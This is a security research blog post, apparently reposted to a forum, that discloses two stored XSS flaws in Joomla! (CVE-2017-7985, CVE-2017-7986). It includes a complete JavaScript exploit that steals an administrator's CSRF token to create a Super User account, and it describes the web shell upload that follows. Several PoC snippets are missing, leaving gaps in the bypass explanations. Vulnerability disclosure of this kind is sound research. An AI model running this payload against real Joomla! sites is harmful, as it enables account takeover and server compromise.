Multiple Joomla! Core XSS Vulnerabilities Are Discovered

[Nytro]

Multiple Joomla! Core XSS Vulnerabilities Are Discovered

by  Zhouyuan Yang  |  May 04, 2017  |  Filed in: Security Research

 

Joomla! is one of the world's most popular content management system (CMS) solutions. It enables users to build custom Web sites and powerful online applications. More than 3 percent of Web sites are running Joomla!, and it accounts for more than 9 percent of CMS market share.

As of November 2016, Joomla! had been downloaded over 78 million times. Over 7,800 free and commercial extensions are also currently available from the official Joomla! Extension Directory, and more are available from other sources.

This year, as a FortiGuard researcher I discovered and reported two Cross-Site Scripting (XSS) vulnerabilities in Joomla!. They are identified as CVE-2017-7985 and CVE-2017-7986. Joomla! patched them [1] [2] this week. These vulnerabilities affect Joomla! versions 1.5.0 through 3.6.5. They exist because these versions of Joomla! fail to sanitize malicious user input when users post or edit an article. Remote attacker could exploit them to run malicious code in victims’ browser, potentially allowing the attacker to gain control of the victim’s Joomla! account. If the victim has higher permission, like system administrator, the remote attacker could gain full control of the web server.

In this blog, I will share the details of these vulnerabilities.

Background

Joomla! has its own XSS filters. For example, a user with post permission is not allowed to use full HTML elements. When this user posts an article with HTML attributes, Joomla! will sterilize dangerous code like “javascript:alert()”, “background:url()” and so on. Joomla! has two ways to achieve this sterilization. On the client side, it uses the editor called “TinyMCE.” On the server side, it sanitizes the request before storing it on the server.

Analysis

To demonstrate these vulnerabilities, the test account ‘yzy1’ is created. It has author permission, which is not allowed to use full HTML elements.

To bypass the client side sterilization, the attacker can use a network intercept tool like Burp Suite or just change the default editor to other Joomla! built-in editors, like CoodeMirror or None, as shown in Figure 1.

Figure 1. Bypassing the client side XSS filter

On the server side, I found two ways to bypass the XSS filters. They are identified as CVE-2017-7985 and CVE-2017-7986.

CVE-2017-7985

The Joomla! server side XSS filter sterilizes dangerous code and saves the safe characters. For example, when we post the following code with the test account,  Joomla! sterilizes it by double quoting the , deleting the , and adding safe links to the URLs, as shown in Figure 2.

Figure 2. Joomla! XSS filter

But an attacker could take advantage of the filter by trying to let the filter to reconstruct the code and rebuild the scripts. For example, we can add the code Note that the double quote in  is the CORRECT DOUBLE QUOTATION MARK, as shown in Figure 3.

Figure 3. Inserting the PoC for CVE-2017-7985

When victims access the post, regardless of whether it’s published or not, the inserted XSS code will be triggered in both the main page and the administrator page, as shown in Figures 4 and 5.

Figure 4. CVE-2017-7985 PoC triggered in the home page

Figure 5. CVE-2017-7985 PoC triggered in the administrator page

CVE-2017-7986

When posting an article, the attacker could bypass the XSS filter in an HTML  tag by changing the script from  to , because the  is the mark “:” in HTML format. The attacker could then trigger this script code by adding a  tag. For example, the attacker can insert the following code in an article , as shown in Figure 6. 

 

Figure 6. Insert the PoC for CVE-2017-7986

When victims access the post, regardless of whether it’s published or not, and click the “Click Me” button, the inserted XSS code will be triggered in both the main page and the administrator page, as shown in Figures 7 and 8.

Figure 7. CVE-2017-7986 PoC triggered in home page

Figure 8. CVE-2017-7986 PoC triggered in administrator page

Exploit

Here I provide an exploit example for CVE-2017-7986 that allows an attacker with a low permission account to create a Super User account and upload a web shell. To achieve this, I will write a small piece of JavaScript code for creating a Super User account by using the site administrator’s permission. It first obtains the CSRF token from the user edit page , and then posts the Super User account creation request to the server with the stolen CSRF token. The new Super User will be ‘Fortinet Yzy’ with the password ‘test’.

 

var request = new XMLHttpRequest();
var req = new XMLHttpRequest();
var id = '';
var boundary = Math.random().toString().substr(2);
var space = "-----------------------------";

request.open('GET', 'index.php?option=com_users&view=user&layout=edit', true);
request.onload = function() {
    if (request.status >= 200 && request.status < 400) {
        var resp = request.responseText;
        var myRegex = /<input type="hidden" name="([a-z0-9]+)" value="1" \/>/;
        id = myRegex.exec(resp)[1];
        req.open('POST', 'index.php?option=com_users&layout=edit&id=0', true);
        req.setRequestHeader("content-type", "multipart/form-data; boundary=---------------------------" + boundary);
        var multipart = space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[name]\"" +
            "\r\n\r\nFortinet Yzy\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[username]\"" +
            "\r\n\r\nfortinetyzy\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[password]\"" +
            "\r\n\r\ntest\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[password2]\"" +
            "\r\n\r\ntest\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[email]\"" +
            "\r\n\r\nzyg@gmail.com\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[registerDate]\"" +
            "\r\n\r\n\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[lastvisitDate]\"" +
            "\r\n\r\n\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[lastResetTime]\"" +
            "\r\n\r\n\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[resetCount]\"" +
            "\r\n\r\n0\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[sendEmail]\"" +
            "\r\n\r\n0\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[block]\"" +
            "\r\n\r\n0\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[requireReset]\"" +
            "\r\n\r\n0\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[id]\"" +
            "\r\n\r\n0\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[groups][]\"" +
            "\r\n\r\n8\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][admin_style]\"" +
            "\r\n\r\n\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][admin_language]\"" +
            "\r\n\r\n\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][language]\"" +
            "\r\n\r\n\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][editor]\"" +
            "\r\n\r\n\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][helpsite]\"" +
            "\r\n\r\n\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"jform[params][timezone]\"" +
            "\r\n\r\n\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"task\"" +
            "\r\n\r\nuser.apply\r\n" +
            space + boundary +
            "\r\nContent-Disposition: form-data; name=\"" + id + "\"" +
            "\r\n\r\n1\r\n" +
            space + boundary + "--\r\n";
        req.onload = function() {
            if (req.status >= 200 && req.status < 400) {
                var resp = req.responseText;
                console.log(resp);
            }
        };
        req.send(multipart);
    }
};

request.send();

An attacker can add this code to Joomla! by exploiting this XSS vulnerability, as shown in Figure 9.

Figure 9. Adding XSS code

 

Once the site administrator triggers this XSS attack in the administrator page, a Super User account will be immediately created, as shown in Figures 10 and 11.

Figure 10. Site administrator triggers the XSS attack in the administrator page

Figure 11. A new Super User account is created by the attacker

The attacker can then login to Joomla! using this new Super User permission and upload a web shell by installing a plugin, as shown in Figures 12 and 13.

Figure 12. Uploading a web shell using the attacker’s Super User account

Figure 13. Attacker accesses the web shell and executes commands

Solution

All users of Joomla! should upgrade to the latest version immediately. Additionally, organizations that have deployed Fortinet IPS solutions are already protected from these vulnerabilities with the signatures Joomla!.Core.Article.Post.Colon.Char.XSS and Joomla!.Core.Article.Post.Quote.Char.XSS.

by  Zhouyuan Yang  |  May 04, 2017  |  Filed in: Security Research

 

Sursa: https://blog.fortinet.com/2017/05/04/multiple-joomla-core-xss-vulnerabilities-are-discovered